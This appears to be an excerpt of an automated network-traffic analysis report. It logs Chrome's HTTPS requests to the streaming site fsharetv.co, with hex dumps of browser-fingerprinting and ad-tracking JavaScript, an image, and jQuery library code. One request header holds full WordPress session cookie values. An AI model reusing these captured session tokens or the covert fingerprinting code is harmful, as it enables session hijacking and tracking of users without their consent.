                                                                                                                                                                                          2024-12-15 11:37:56 UTC2896INData Raw: 73 63 72 65 65 6e 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6d 28 64 28 6e 29 2c 6e 75 6c 6c 29 7d 2c 74 3d 5b 65 28 6e 2e 77 69 64 74 68 29 2c 65 28 6e 2e 68 65 69 67 68 74 29 5d 3b 72 65 74 75 72 6e 20 74 2e 73 6f 72 74 28 29 2e 72 65 76 65 72 73 65 28 29 2c 74 7d 76 61 72 20 24 2c 6e 6e 2c 65 6e 3d 32 35 30 30 3b 66 75 6e 63 74 69 6f 6e 20 74 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 6e 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 72 6e 28 29 3b 6f 6e 28 65 29 3f 6e 6e 3d 73 65 74 54 69 6d 65 6f 75 74 28 6e 2c 65 6e 29 3a 28 24 3d 65 2c 6e 6e 3d 76 6f 69 64 20 30 29 7d 3b 6e 28 29 7d 7d 28 29 2c 66 75 6e
                                                                                                                                                                                          Data Ascii: screen,e=function(n){return m(d(n),null)},t=[e(n.width),e(n.height)];return t.sort().reverse(),t}var $,nn,en=2500;function tn(){var n=this;return function(){if(void 0===nn){var n=function(){var e=rn();on(e)?nn=setTimeout(n,en):($=e,nn=void 0)};n()}}(),fun
                                                                                                                                                                                          2024-12-15 11:37:56 UTC16384INData Raw: 33 36 33 34 38 2c 33 36 33 34 39 2c 33 37 34 34 30 2c 33 37 34 34 31 2c 33 37 34 34 33 2c 37 39 33 36 2c 37 39 33 37 2c 37 39 33 38 5d 29 2c 67 6e 3d 6e 65 77 20 53 65 74 28 5b 33 34 30 34 37 2c 33 35 37 32 33 2c 33 36 30 36 33 2c 33 34 38 35 32 2c 33 34 38 35 33 2c 33 34 38 35 34 2c 33 34 32 32 39 2c 33 36 33 39 32 2c 33 36 37 39 35 2c 33 38 34 34 39 5d 29 2c 77 6e 3d 5b 22 46 52 41 47 4d 45 4e 54 5f 53 48 41 44 45 52 22 2c 22 56 45 52 54 45 58 5f 53 48 41 44 45 52 22 5d 2c 4c 6e 3d 5b 22 4c 4f 57 5f 46 4c 4f 41 54 22 2c 22 4d 45 44 49 55 4d 5f 46 4c 4f 41 54 22 2c 22 48 49 47 48 5f 46 4c 4f 41 54 22 2c 22 4c 4f 57 5f 49 4e 54 22 2c 22 4d 45 44 49 55 4d 5f 49 4e 54 22 2c 22 48 49 47 48 5f 49 4e 54 22 5d 2c 6b 6e 3d 22 57 45 42 47 4c 5f 64 65 62 75 67 5f
                                                                                                                                                                                          Data Ascii: 36348,36349,37440,37441,37443,7936,7937,7938]),gn=new Set([34047,35723,36063,34852,34853,34854,34229,36392,36795,38449]),wn=["FRAGMENT_SHADER","VERTEX_SHADER"],Ln=["LOW_FLOAT","MEDIUM_FLOAT","HIGH_FLOAT","LOW_INT","MEDIUM_INT","HIGH_INT"],kn="WEBGL_debug_
                                                                                                                                                                                          2024-12-15 11:37:57 UTC9680INData Raw: 6e 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 74 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 65 2e 61 74 74 72 69 62 75 74 69 6f 6e 53 6f 75 72 63 65 49 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 65 2e 61 74 74 72 69 62 75 74 69 6f 6e 73 6f 75 72 63 65 69 64 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 53 74 72 69 6e 67 28 74 29 7d 2c 61 75 64 69 6f 42 61 73 65 4c 61 74 65 6e 63 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 4e 28 29 7c 7c 43 28 29 3f 77 69 6e 64 6f 77 2e 41 75 64 69 6f 43 6f 6e 74 65 78 74 26 26 6e 75 6c 6c 21 3d 3d 28 6e 3d 28 6e 65 77 20 41 75 64 69 6f 43 6f 6e 74 65 78 74 29 2e 62 61 73 65 4c 61 74 65 6e 63 79 29 26 26 76 6f
                                                                                                                                                                                          Data Ascii: n,e=document.createElement("a"),t=null!==(n=e.attributionSourceId)&&void 0!==n?n:e.attributionsourceid;return void 0===t?void 0:String(t)},audioBaseLatency:function(){var n;return N()||C()?window.AudioContext&&null!==(n=(new AudioContext).baseLatency)&&vo
                                                                                                                                                                                          2024-12-15 11:37:57 UTC16384INData Raw: 44 45 5f 43 41 50 5f 53 54 41 54 45 3d 21 31 3b 46 45 41 54 55 52 45 53 2e 4d 45 41 53 55 52 45 5f 42 41 4e 44 57 49 44 54 48 3d 21 30 3b 76 61 72 20 4e 41 4d 45 53 50 41 43 45 3d 22 7a 69 67 69 5f 74 61 67 5f 69 64 22 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 62 28 29 7b 76 61 72 20 61 3d 6e 65 77 20 44 61 74 65 2c 62 3d 73 62 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 68 61 73 46 6f 63 75 73 28 29 26 26 28 75 28 68 2e 49 44 4c 45 5f 4d 45 41 53 55 52 49 4e 47 2c 4d 61 74 68 2e 61 62 73 28 28 6e 65 77 20 44 61 74 65 2d 61 29 2f 31 45 33 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 62 29 29 7d 2c 34 30 30 29 7d 66 75 6e 63 74 69 6f 6e 20 48 61 28 61 29 7b 76 61 72 20 62 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70
                                                                                                                                                                                          Data Ascii: DE_CAP_STATE=!1;FEATURES.MEASURE_BANDWIDTH=!0;var NAMESPACE="zigi_tag_id";(function(){function jb(){var a=new Date,b=sb(function(){g.hasFocus()&&(u(h.IDLE_MEASURING,Math.abs((new Date-a)/1E3)),clearInterval(b))},400)}function Ha(a){var b="undefined"==typ
                                                                                                                                                                                          2024-12-15 11:37:57 UTC992INData Raw: 79 3f 61 28 29 3a 70 2e 64 6f 6d 52 65 61 64 79 28 61 29 7d 3b 69 66 28 70 2e 64 6f 63 75 6d 65 6e 74 52 65 61 64 79 53 74 61 74 65 49 73 43 6f 6d 70 6c 65 74 65 64 28 29 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 65 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 65 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 29 7b 76 61 72 20 63 3d 0a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3f 62 28 29 3a 76 28 63 2c 35 29 7d 3b 76 28 63 2c 35 29 7d 65 6c 73 65 20 70 2e 61 64 64 24 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 62 2c 21 30 2c 65 2e 64 6f 63 75 6d 65 6e 74 2c 21 31 29 2c 70 2e 61 64 64 24 28 22 6c 6f 61 64 22 2c 62 2c 21 30 2c
                                                                                                                                                                                          Data Ascii: y?a():p.domReady(a)};if(p.documentReadyStateIsCompleted()||"loading"!==e.document.readyState&&!e.document.documentElement.doScroll){var c=function(){e.document.body?b():v(c,5)};v(c,5)}else p.add$("DOMContentLoaded",b,!0,e.document,!1),p.add$("load",b,!0,
                                                                                                                                                                                          2024-12-15 11:37:57 UTC16384INData Raw: 6c 63 75 6c 61 74 65 50 61 67 65 58 59 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 7c 7c 65 2e 65 76 65 6e 74 3b 76 61 72 20 62 3d 61 2e 70 61 67 65 58 2c 63 3d 61 2e 70 61 67 65 59 3b 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 28 62 3d 28 61 2e 63 6c 69 65 6e 74 58 7c 7c 61 2e 73 63 72 65 65 6e 58 29 2b 28 67 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 4c 65 66 74 7c 7c 30 29 2b 28 67 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 7c 7c 0a 30 29 2c 63 3d 28 61 2e 63 6c 69 65 6e 74 59 7c 7c 61 2e 73 63 72 65 65 6e 59 29 2b 28 67 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 7c 7c 30 29 2b 28 67 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 7c 7c 30 29 29 3b 72 65 74 75
                                                                                                                                                                                          Data Ascii: lculatePageXY:function(a){a=a||e.event;var b=a.pageX,c=a.pageY;"undefined"==typeof b&&(b=(a.clientX||a.screenX)+(g.body.scrollLeft||0)+(g.documentElement.scrollLeft||0),c=(a.clientY||a.screenY)+(g.body.scrollTop||0)+(g.documentElement.scrollTop||0));retu
                                                                                                                                                                                          2024-12-15 11:37:57 UTC3888INData Raw: 68 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 63 3d 61 2e 73 74 79 6c 65 3b 72 65 74 75 72 6e 22 68 69 64 64 65 6e 22 3d 3d 63 2e 76 69 73 69 62 69 6c 69 74 79 7c 7c 22 6e 6f 6e 65 22 3d 3d 63 2e 64 69 73 70 6c 61 79 3f 21 31 3a 21 28 21 61 2e 6f 66 66 73 65 74 57 69 64 74 68 26 26 21 61 2e 6f 66 66 73 65 74 48 65 69 67 68 74 29 7d 2c 69 6e 73 65 72 74 41 66 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 62 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 7d 2c 72 65 6d 6f 76 65 49 6e 74 65 72 73 65 63 74 69 6f 6e 46 72 6f 6d 4e 6f 64 65 4c 69 73 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 0a 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 5b 5d 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74
                                                                                                                                                                                          Data Ascii: ht)return!1;var c=a.style;return"hidden"==c.visibility||"none"==c.display?!1:!(!a.offsetWidth&&!a.offsetHeight)},insertAfter:function(a,b){b.parentNode.insertBefore(a,b.nextSibling)},removeIntersectionFromNodeList:function(a,b){for(var c=[],d=0;d<a.lengt
                                                                                                                                                                                          2024-12-15 11:37:57 UTC2896INData Raw: 22 2b 66 2b 22 5d 22 29 3b 69 66 28 71 29 7b 76 61 72 20 6e 3d 71 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6f 6e 74 65 6e 74 22 29 3b 78 64 28 6e 2c 62 29 7d 7d 63 61 74 63 68 28 6b 29 7b 7a 28 68 2e 4b 45 59 57 4f 52 44 5f 53 45 4c 45 43 54 4f 52 5f 45 52 52 4f 52 2c 22 65 72 72 6f 72 20 69 6e 20 6b 65 79 77 6f 72 64 20 73 65 6c 65 63 74 6f 72 3a 20 22 2b 66 2b 22 2c 20 22 2b 6b 29 2c 74 28 22 45 72 72 6f 72 20 69 6e 20 6b 65 79 77 6f 72 64 73 20 73 65 6c 65 63 74 6f 72 2c 20 22 2b 66 2b 22 3a 20 22 2b 6b 2c 22 64 65 62 75 67 22 29 7d 72 65 74 75 72 6e 20 62 7d 2c 78 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 79 64 28 29 2e 66 6f 72 45 61 63 68 24 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 31 3c 63 26 26 33 3c 61 2e 6c
                                                                                                                                                                                          Data Ascii: "+f+"]");if(q){var n=q.getAttribute("content");xd(n,b)}}catch(k){z(h.KEYWORD_SELECTOR_ERROR,"error in keyword selector: "+f+", "+k),t("Error in keywords selector, "+f+": "+k,"debug")}return b},xe=function(a){var b=[];yd().forEach$(function(a,c){1<c&&3<a.l
                                                                                                                                                                                          2024-12-15 11:37:57 UTC11584INData Raw: 28 46 45 41 54 55 52 45 53 2e 46 49 4e 47 45 52 50 52 49 4e 54 3d 21 31 29 3b 5f 5f 43 48 45 43 4b 5f 46 45 41 54 55 52 45 5f 5f 28 46 45 41 54 55 52 45 53 2e 46 49 4e 47 45 52 50 52 49 4e 54 29 26 26 70 2e 64 6f 6d 52 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 61 2e 6f 6e 52 65 6c 65 61 73 65 28 6d 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 61 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 46 69 6e 67 65 72 70 72 69 6e 74 32 2e 46 50 32 4f 70 74 69 6f 6e 73 3b 61 2e 65 78 63 6c 75 64 65 2e 50 69 78 65 6c 52 61 74 69 6f 3d 0a 21 30 3b 61 2e 65 78 63 6c 75 64 65 2e 41 64 42 6c 6f 63 6b 3d 21 30 3b 61 2e 65 78 74 65 6e 64 65 64 4a 73 46 6f 6e 74 73 3d 21 30 3b 78 61 3d 28 6e 65 77 20 77 69 6e 64 6f 77 2e 46 69 6e 67 65 72 70 72 69 6e 74 32
                                                                                                                                                                                          Data Ascii: (FEATURES.FINGERPRINT=!1);__CHECK_FEATURE__(FEATURES.FINGERPRINT)&&p.domReady(function(){La.onRelease(mb,function(){try{var a=new window.Fingerprint2.FP2Options;a.exclude.PixelRatio=!0;a.exclude.AdBlock=!0;a.extendedJsFonts=!0;xa=(new window.Fingerprint2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          16192.168.2.1649732104.21.10.1584436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC974OUTGET /img/fsharetv.png HTTP/1.1
                                                                                                                                                                                          Host: fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
                                                                                                                                                                                          2024-12-15 11:37:58 UTC907INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:58 GMT
                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                          Content-Length: 4334
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=1800
                                                                                                                                                                                          Last-Modified: Tue, 15 Aug 2023 08:09:50 GMT
                                                                                                                                                                                          ETag: W/"10ee-189f83e7726"
                                                                                                                                                                                          CF-Cache-Status: REVALIDATED
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gNTZL%2F%2BmcPJZrpIcbhcPDZ7a43pB14TP7lB1agMkHxQ55WV3kFqNR2YVCsyHg5ZT5RGuc7z2c9kPzh82N9yv4Qx7dy%2Fw06lZmIGN4pgAU8O25%2FgZHs4ikg6x%2F01SQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2624fecdf84349-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1578&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1574&delivery_rate=1788120&cwnd=227&unsent_bytes=0&cid=bcbf2c47fc4cc138&ts=2299&x=0"
                                                                                                                                                                                          2024-12-15 11:37:58 UTC462INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 10 83 49 44 41 54 78 5e ed 9d 5b 6c 1c d5 1d c6 47 88 12 b5 8a 6a 41 2f 86 52 d8 0a 8a dc 0b d4 2a 50 ac 50 8a 05 2d 71 8b 10 2b 10 65 69 8b 62 41 a0 a6 50 94 5e e5 07 c8 9e dd 45 32 55 a0 0e 57 97 8b 88 45 69 42 15 05 87 70 31 44 14 d3 42 9b 52 2a 42 84 a8 29 45 c4 a2 4d 9c f0 e2 47 bf 4e bf ff 99 b3 ab d9 b3 67 d6 bb de 99 f1 7a f7 fb 49 9f 76 77 ce 65 ce cc fe bf 39 73 e6 ea 11 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 90 38 38 52 f2 86 8f 96
                                                                                                                                                                                          Data Ascii: PNGIHDRXsRGBgAMAapHYsodIDATx^[lGjA/R*PP-q+eibAP^E2UWEiBp1DBR*B)EMGNgzIvwe9sB!B!B!B!B!B!B!88R
                                                                                                                                                                                          2024-12-15 11:37:58 UTC1369INData Raw: 80 ec 73 05 4e 37 09 bb 75 23 66 75 10 52 0d 02 a4 1b 77 ad 6c 4d 98 d5 41 48 35 8e 60 e9 3a c9 81 01 b3 3a 08 a9 c6 15 30 22 d9 f5 3a aa bc 01 93 6d 55 23 63 0c d9 8d c2 72 2d d8 cb 29 a2 41 48 24 ce 80 e9 d0 81 ab 1c da 75 2e 2f 0d 42 a2 70 05 8c 1c f6 35 c9 1d 07 96 af e6 1c 0c 0d 42 22 b1 83 45 ab 83 6f 4c 12 33 d8 cb 4b 83 90 48 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10 42 02 ec 60 d1 a2 41 08 09 b0 83 45 8b 06 21 24 c0 0e 16 2d 1a 84 90 00 3b 58 b4 68 10
                                                                                                                                                                                          Data Ascii: sN7u#fuRwlMAH5`::0":mU#cr-)AH$u./Bp5B"EoL3KH`AE!$-;XhB`AE!$-;XhB`AE!$-;XhB`AE!$-;XhB`AE!$-;Xh
                                                                                                                                                                                          2024-12-15 11:37:58 UTC1369INData Raw: 17 c3 ef c0 e7 92 e3 10 69 9f 94 73 b5 53 57 18 c2 4e 87 96 fd 32 1d b4 33 63 d7 17 b5 4c 51 a0 8e 01 bb 0e 2c 07 0d 22 69 f8 1e 9b 41 04 ac d8 aa ee be 59 49 79 f9 d3 4d 75 15 5c 81 e7 9a 7f 3d 1a 35 08 ea 95 f3 08 4d 0d ce a5 7d 52 d6 d5 4e 5d 69 08 3b 1d 5a 31 83 98 8d 5a 4d 0c a4 71 75 44 db 50 2f 30 e4 53 fe d4 e5 c8 15 c8 ad 1e be 14 a1 bc 04 67 55 4f 22 f3 b3 f3 25 61 10 63 8e a6 db 2f ed 93 f2 ae 76 ea 8a 43 d8 e9 50 22 06 71 b5 a5 11 a1 dc 92 07 2f 3a 8a 46 02 23 4e f0 a7 c9 b9 90 a6 b6 c0 b6 50 be ea 10 ac eb cf 4e c2 20 98 36 65 e7 69 44 d2 3e 29 ef 6a a7 ae 38 84 9d 0e b5 9b 41 ba eb ed 57 69 1b a4 8c 31 ca 26 f9 a3 a2 84 b6 8c e3 b3 e6 e8 12 a6 cd 9a 6a 34 26 6f 55 9e b8 0d 82 fa 6a 06 ab 46 fa 92 8c 7a 2a b7 45 be db e5 75 e5 21 ec 74 a8 9d
                                                                                                                                                                                          Data Ascii: isSWN23cLQ,"iAYIyMu\=5M}RN]i;Z1ZMquDP/0SgUO"%ac/vCP"q/:F#NPN 6eiD>)j8AWi1&j4&oUjFz*Eu!t
                                                                                                                                                                                          2024-12-15 11:37:58 UTC1134INData Raw: 90 19 18 64 f6 2f c5 b3 d4 6b c5 2f 2b 18 64 ea f5 e2 17 67 df 28 9e ee bf 59 fc c2 cc 9b ea e4 a1 b7 d4 49 c3 07 d4 89 23 ff 2a 7e 76 e1 dd d2 a7 7c 1a c4 2d b3 8a 49 d2 c0 20 6b ee 54 a3 99 3b d5 a6 cc 96 fc cf 27 b6 a8 9b 7b ef 56 3f c9 de 93 bf e9 e0 7d ea 46 ff 81 fc f5 fb 26 f3 1b 9a be b1 69 8f 1a 1c 86 41 fc e9 c2 ba c5 bd 6a 20 f7 a2 3a 2f fb 72 e9 ec 89 99 fc e7 75 5d af aa 2f e5 e4 fb df d4 19 7d 30 c8 22 0c e2 4b 0f f2 8e 3a b5 f7 ed e2 49 d3 30 88 ff ef d2 09 13 ba 32 8b ff 96 8e c9 1e 2a 7a b1 f4 70 84 2c 49 60 92 4d 19 f9 bc 2b 7f eb 58 1e 86 d8 aa 36 f5 dc 9b bf 61 f6 01 b5 d1 7f 30 7f fd b8 c9 da 10 bb d5 60 ff 33 85 0b 17 c5 20 cf ab 75 d9 69 75 de 00 7a 90 4a b0 bf aa ce cc be a2 be 56 e9 99 fe a1 4e 1b d5 06 29 9e 32 2b 3d 08 0c e2 8b
                                                                                                                                                                                          Data Ascii: d/k/+dg(YI#*~v|-I kT;'{V?}F&iAj :/ru]/}0"K:I02*zp,I`M+X6a0`3 uiuzJVN)2+=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          17192.168.2.1649733104.17.25.144436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC417OUTGET /ajax/libs/jquery.devbridge-autocomplete/1.4.11/jquery.autocomplete.min.js HTTP/1.1
                                                                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC963INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                                                                          ETag: W/"5eb03ec2-3329"
                                                                                                                                                                                          Last-Modified: Mon, 04 May 2020 16:11:46 GMT
                                                                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                          Age: 2
                                                                                                                                                                                          Expires: Fri, 05 Dec 2025 11:37:57 GMT
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMTFDTlRRhE5jQukWk0ODM6p1LjI2btARVI%2F93vHVe%2Bvyrz3k%2BRe8X3tWPvvJ7Oef8WBVMUixfTloXAVZdlXOGjTwdkGdtHlLo%2B5rCodNB%2BIz3QdV%2F3aU3BZS8kp%2BWVoUbJzGA5%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2625033eaf4286-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC406INData Raw: 33 33 32 39 0d 0a 2f 2a 2a 0a 2a 20 20 41 6a 61 78 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 66 6f 72 20 6a 51 75 65 72 79 2c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 31 31 0a 2a 20 20 28 63 29 20 32 30 31 37 20 54 6f 6d 61 73 20 4b 69 72 64 61 0a 2a 0a 2a 20 20 41 6a 61 78 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 66 6f 72 20 6a 51 75 65 72 79 20 69 73 20 66 72 65 65 6c 79 20 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 75 6e 64 65 72 20 74 68 65 20 74 65 72 6d 73 20 6f 66 20 61 6e 20 4d 49 54 2d 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 2e 0a 2a 20 20 46 6f 72 20 64 65 74 61 69 6c 73 2c 20 73 65 65 20 74 68 65 20 77 65 62 20 73 69 74 65 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 62 72 69 64 67 65 2f 6a 51 75 65 72 79 2d 41 75 74 6f
                                                                                                                                                                                          Data Ascii: 3329/*** Ajax Autocomplete for jQuery, version 1.4.11* (c) 2017 Tomas Kirda** Ajax Autocomplete for jQuery is freely distributable under the terms of an MIT-style license.* For details, see the web site: https://github.com/devbridge/jQuery-Auto
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1369INData Raw: 3f 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 3a 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 65 2e 65 6c 65 6d 65 6e 74 3d 63 2c 65 2e 65 6c 3d 61 28 63 29 2c 65 2e 73 75 67 67 65 73 74 69 6f 6e 73 3d 5b 5d 2c 65 2e 62 61 64 51 75 65 72 69 65 73 3d 5b 5d 2c 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 2d 31 2c 65 2e 63 75 72 72 65 6e 74 56 61 6c 75 65 3d 65 2e 65 6c 65 6d 65 6e 74 2e 76 61 6c 75 65 2c 65 2e 74 69 6d 65 6f 75 74 49 64 3d 6e 75 6c 6c 2c 65 2e 63 61 63 68 65 64 52 65 73 70 6f 6e 73 65 3d 7b 7d 2c 65 2e 6f 6e 43 68 61 6e 67 65 54 69 6d 65 6f 75 74 3d 6e 75 6c 6c 2c 65 2e 6f 6e 43 68 61 6e 67 65
                                                                                                                                                                                          Data Ascii: ?require("jquery"):jQuery)}(function(a){"use strict";function b(c,d){var e=this;e.element=c,e.el=a(c),e.suggestions=[],e.badQueries=[],e.selectedIndex=-1,e.currentValue=e.element.value,e.timeoutId=null,e.cachedResponse={},e.onChangeTimeout=null,e.onChange
